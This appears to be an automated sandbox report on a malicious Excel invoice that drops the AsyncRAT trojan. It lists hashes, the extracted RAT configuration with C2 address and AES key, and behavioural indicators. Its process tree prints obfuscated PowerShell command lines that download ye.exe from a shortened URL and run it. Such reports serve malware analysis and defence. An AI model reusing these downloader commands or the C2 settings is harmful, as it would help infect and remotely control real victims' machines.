Analysis
- max time kernel: 150s
- max time network: 154s
- platform: windows10_x64
- resource: win10
- submitted: 26-10-2020 10:19
- Static task: static1
- Behavioral task: behavioral1
  - Sample: PROFORMA INVOICE INV-1.xls
  - Resource: win7
General
- Target: PROFORMA INVOICE INV-1.xls
- Size: 66KB
- MD5: 53a8387449c7201a5d07f1a065d9e789
- SHA1: 7fb04159123617c551cbe189cccd6d0c9fe179ae
- SHA256: b353116f931196bc449483113b61ac01a50bd35b24569cb79919cec26dc6d535
- SHA512: fc54e553c2299eaf386bbad998b2d3a11f7cd613e2807958f5e2c5631b3e8a05531f2c3bf21d02efbbe21bb23e4703e27d49c1d018e8ca919c16df6b1f9ee8ee
Malware Config
Extracted (download URL)
- https://tinyurl.com/yxbf64lf

Extracted (family: asyncrat, version 0.5.7B, C2 185.165.153.249:4371, mutex AsyncMutex_6SI8OkPnk)
- aes_key: 4lpLfCzV6wCkayaT0MjD3qp2ZVBd759O
- anti_detection: false
- autorun: false
- bdos: false
- delay: Default
- host: 185.165.153.249
- hwid: 3
- install_file:
- install_folder: %AppData%
- mutex: AsyncMutex_6SI8OkPnk
- pastebin_config: null
- port: 4371
- version: 0.5.7B
Signatures

- Process spawned unexpected child process (3 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4332 | 4756 | cmd.exe | EXCEL.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4348 | 4756 | cmd.exe | EXCEL.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4356 | 4756 | cmd.exe | EXCEL.EXE

- ServiceHost packer (5 IoCs)
  Detects ServiceHost packer used for .NET malware.
  resource | yara_rule
  behavioral2/memory/196-35-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/196-37-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/196-36-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/196-38-0x0000000000000000-mapping.dmp | servicehost
  behavioral2/memory/196-39-0x0000000000000000-mapping.dmp | servicehost

- Blacklisted process makes network request (2 IoCs)
  flow | pid | process
  16 | 3964 | powershell.exe
  18 | 3964 | powershell.exe

- Executes dropped EXE (2 IoCs)
  pid | process
  196 | ye.exe
  3224 | ye.exe

- Suspicious use of NtSetInformationThreadHideFromDebugger (5 IoCs)
  pid | process
  196 | ye.exe (5 occurrences)

- Suspicious use of SetThreadContext (1 IoC)
  description | pid | process | target process
  PID 196 set thread context of 3224 | 196 | ye.exe | ye.exe

- Program crash (1 IoC)
  pid | pid_target | process | target process
  1120 | 196 | WerFault.exe | ye.exe

- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE

- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid | process
  4756 | EXCEL.EXE

- Suspicious behavior: EnumeratesProcesses (27 IoCs)
  pid | process | occurrences
  3236 | powershell.exe | 3
  620 | powershell.exe | 3
  3964 | powershell.exe | 3
  196 | ye.exe | 3
  1120 | WerFault.exe | 15

- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 3236 | powershell.exe
  Token: SeDebugPrivilege | 620 | powershell.exe
  Token: SeDebugPrivilege | 3964 | powershell.exe
  Token: SeDebugPrivilege | 196 | ye.exe
  Token: SeRestorePrivilege | 1120 | WerFault.exe
  Token: SeBackupPrivilege | 1120 | WerFault.exe
  Token: SeDebugPrivilege | 1120 | WerFault.exe

- Suspicious use of SetWindowsHookEx (12 IoCs)
  pid | process
  4756 | EXCEL.EXE (12 occurrences)

- Suspicious use of WriteProcessMemory (23 IoCs)
  description | pid | process | target process | occurrences
  PID 4756 wrote to memory of 4332 | 4756 | EXCEL.EXE | cmd.exe | 2
  PID 4756 wrote to memory of 4348 | 4756 | EXCEL.EXE | cmd.exe | 2
  PID 4756 wrote to memory of 4356 | 4756 | EXCEL.EXE | cmd.exe | 2
  PID 4348 wrote to memory of 620 | 4348 | cmd.exe | powershell.exe | 2
  PID 4356 wrote to memory of 3236 | 4356 | cmd.exe | powershell.exe | 2
  PID 4332 wrote to memory of 3964 | 4332 | cmd.exe | powershell.exe | 2
  PID 3236 wrote to memory of 196 | 3236 | powershell.exe | ye.exe | 3
  PID 196 wrote to memory of 3224 | 196 | ye.exe | ye.exe | 8
Processes (process tree; the number in brackets is the depth in the tree)

- [1] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE INV-1.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  - [2] C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /k p^ower^shell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxbf64lf'),'ye.exe')
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxbf64lf'),'ye.exe')
      - Blacklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  - [2] C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /k p^ower^shell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  - [2] C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /k po^wer^shell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - [4] C:\Users\Admin\AppData\Roaming\ye.exe
        Command line: "C:\Users\Admin\AppData\Roaming\ye.exe"
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        - [5] C:\Users\Admin\AppData\Roaming\ye.exe
          Command line: "C:\Users\Admin\AppData\Roaming\ye.exe"
          - Executes dropped EXE

        - [5] C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 896
          - Program crash
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads (files created during the run)

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: d737fc27bbf2f3bd19d1706af83dbe3f
  SHA1: 212d219394124968b50769c371121a577d973985
  SHA256: b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
  SHA512: 974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 8493230a82a2d4feba6160f79c301470
  SHA1: 33e1a17ae1d48172959c4a6458daaeff2bc8463c
  SHA256: a60b14883523d776ef31d5f88a1c9feb7811504ed28a6a4fc7237fab20c38ee8
  SHA512: 7b481b5912f46e90f733f9d735139482609d36783920529ca1028cce9fd8554aa56bb3064f0b9230c5aa0297b91e9fdee835c53c1337eef8df945b1dddf3ae18

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 8d04343a3598c72eaa9fbb53faf13467
  SHA1: fe730469384b244b76e65fb22e7811bb58c655f5
  SHA256: 197db7b97fd18ccd2e3308240047ff3be499f25f8aff568605bde2328134c128
  SHA512: 7db608f094ddff4f43550afbccc1d7a74b1aed09549e4e198e953f0b74df813ef1d408ce42e41a0b7f1b89942fac56049e8d1d40addafc8935476f5698e2ace1

- C:\Users\Admin\AppData\Roaming\ye.exe
  MD5: c7fb5824488e31a95ace8792feb44dfc
  SHA1: 17af3089f7d8afbd58ac3ba1e699b10f7b58c50a
  SHA256: 0ad8e244f541e14eb098c8e6f8eba6e2a5cffdf517fe512b85a92c70511bb3bf
  SHA512: 0b6acedb4e150f6fa3122a80b62517424ff809df5a662cfaa3bf0cb2288b110921726fc29a7732f6ee03bfc029cefb383586608f02a87c9919d4f7877cbd423a

- C:\Users\Admin\Documents\ye.exe (same content as the copy in AppData\Roaming)
  MD5: c7fb5824488e31a95ace8792feb44dfc
  SHA1: 17af3089f7d8afbd58ac3ba1e699b10f7b58c50a
  SHA256: 0ad8e244f541e14eb098c8e6f8eba6e2a5cffdf517fe512b85a92c70511bb3bf
  SHA512: 0b6acedb4e150f6fa3122a80b62517424ff809df5a662cfaa3bf0cb2288b110921726fc29a7732f6ee03bfc029cefb383586608f02a87c9919d4f7877cbd423a